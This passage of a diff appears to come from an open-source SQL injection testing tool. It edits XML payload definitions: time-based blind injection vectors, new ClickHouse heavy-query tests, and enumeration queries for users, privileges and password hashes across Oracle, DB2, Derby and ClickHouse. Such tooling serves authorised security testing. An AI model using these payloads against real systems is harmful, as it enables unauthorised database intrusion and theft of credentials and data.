        <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>ClickHouse</dbms>
        </details>
    </test>
    <!-- End of inline queries tests -->
 </root>
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -195,9 +195,9 @@
        <risk>2</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
@@ -235,9 +235,9 @@
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
@@ -276,9 +276,9 @@
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
            <comment>#</comment>
        </request>
        <response>
@@ -318,9 +318,9 @@
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
            <comment>#</comment>
        </request>
        <response>
@@ -1494,6 +1494,44 @@
        </details>
    </test>
    <test>
        <title>ClickHouse AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>ClickHouse</dbms>
        </details>
    </test>
    <test>
        <title>ClickHouse OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>ClickHouse</dbms>
        </details>
    </test>
    <!-- End of time-based boolean tests -->
    <!-- Time-based boolean tests - Numerous clauses -->
@@ -1607,10 +1645,10 @@
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
-        <where>1</where>
+        <where>3</where>
-        <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
+        <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
-            <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
+            <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
@@ -1880,7 +1918,7 @@
        <level>4</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
-        <where>1</where>
+        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
@@ -1900,7 +1938,7 @@
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
-        <where>1</where>
+        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -207,7 +207,7 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS CAP FROM %s)x WHERE CAP=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
@@ -228,7 +228,7 @@
        <length query="LENGTH(%s)"/>
        <isnull query="NVL(%s,' ')"/>
        <delimiter query="||"/>
-        <limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
+        <limit query="ROWNUM AS CAP %s) WHERE CAP"/>
        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
        <limitgroupstart/>
        <limitgroupstop/>
@@ -261,11 +261,11 @@
        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
        <users>
            <inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
-            <blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
+            <blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS CAP FROM SYS.ALL_USERS) WHERE CAP=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
        </users>
        <passwords>
            <inband query="SELECT NAME,PASSWORD FROM SYS.USER$" condition="NAME"/>
-            <blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
+            <blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS CAP FROM SYS.USER$ WHERE NAME='%s') WHERE CAP=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
        </passwords>
        <!--
             NOTE: in Oracle to enumerate the privileges for the session user you can use:
@@ -273,7 +273,7 @@
        -->
        <privileges>
            <inband query="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
+            <blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
        </privileges>
        <!--
             NOTE: in Oracle to enumerate the roles for the session user you can use:
@@ -281,20 +281,20 @@
        -->
        <roles>
            <inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
+            <blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
        </roles>
        <statements>
            <inband query="SELECT SQL_TEXT FROM V$SQL"/>
-            <blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
+            <blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS CAP FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE CAP=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
        </statements>
        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
        <dbs>
            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
-            <blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
+            <blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS CAP FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE CAP=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
        </dbs>
        <tables>
            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES" condition="OWNER"/>
-            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
+            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS CAP FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE CAP=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
@@ -302,7 +302,7 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s ORDER BY ROWNUM"/>
-            <blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq ORDER BY ROWNUM) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+            <blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS CAP FROM %s qq ORDER BY ROWNUM) WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
        <search_db>
@@ -357,8 +357,8 @@
            <blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
        </tables>
        <columns>
-            <inband query="SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
+            <inband query="SELECT MAX(sql) FROM sqlite_master WHERE type='table' AND tbl_name='%s'"/>
-            <blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
+            <blind query="SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='%s' LIMIT 1" condition=""/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
@@ -606,7 +606,7 @@
        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
-        <limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
+        <limit query="ROW_NUMBER() OVER () AS CAP %s) AS qq WHERE CAP"/>
        <limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
        <limitgroupstart/>
        <limitgroupstop/>
@@ -621,7 +621,7 @@
        <hex query="HEX(%s)"/>
        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
        <!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
-        <banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
+        <banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS CAP,versionnumber FROM sysibm.sysversions) AS qq WHERE CAP=1"/>
        <current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
        <!-- NOTE: On DB2 we use the current user as default schema (database) -->
        <current_db query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
@@ -631,24 +631,24 @@
        <is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
        <users>
            <inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
-            <blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
+            <blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS CAP,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE CAP=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
        </users>
        <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
        <passwords/>
        <privileges>
            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
-            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
+            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS CAP,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
        </privileges>
        <roles/>
        <statements/>
        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
        <dbs>
            <inband query="SELECT schemaname FROM syscat.schemata"/>
-            <blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
+            <blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS CAP,schemaname FROM syscat.schemata) AS qq WHERE CAP=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
        </dbs>
        <tables>
            <inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
-            <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
+            <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS CAP,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE CAP=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
@@ -656,7 +656,7 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+            <blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS CAP,%s AS ENTRY_VALUE FROM %s) AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
@@ -938,8 +938,8 @@
        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
-        <limit query="{LIMIT %d OFFSET %d}"/>
+        <limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
-        <limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
+        <limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
        <limitgroupstart query="2"/>
        <limitgroupstop query="1"/>
        <limitstring/>
@@ -962,11 +962,11 @@
        <is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
        <dbs>
            <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
-            <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
+            <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
        </dbs>
        <tables>
            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
-            <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
+            <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
        </tables>
        <columns>
            <!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
@@ -975,11 +975,11 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
+            <blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <users>
            <inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
-            <blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
+            <blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
        </users>
        <!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
        <passwords/>
@@ -1319,6 +1319,75 @@
        </search_column>
    </dbms>
    <dbms value="ClickHouse">
        <cast query="CAST(%s AS String)"/>
        <length query="length(%s)"/>
        <isnull query="ifNull(%s, '')"/>
        <delimiter query="||"/>
        <limit query="LIMIT %d OFFSET %d"/>
        <limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="2"/>
        <limitgroupstop query="1"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="//"/>
        <substring query="substring(%s,%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <inference query="substring((%s),%d,1)>'%c'" />
        <banner query="select version()"/>
        <current_user query="currentUser()"/>
        <current_db query="currentDatabase()"/>
        <hostname query="hostName()"/>
        <table_comment/>
        <column_comment/>
        <is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
        <check_udf/>
        <users>
            <inband query="SELECT name FROM system.users"/>
            <blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
        </users>
        <passwords/>
        <privileges>
            <inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
            <blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
        </privileges>
        <roles>
            <inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
            <blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
        </roles>
        <statements/>
        <dbs>
            <inband query="SELECT schema_name FROM information_schema.schemata"/>
            <blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
        </dbs>
        <tables>
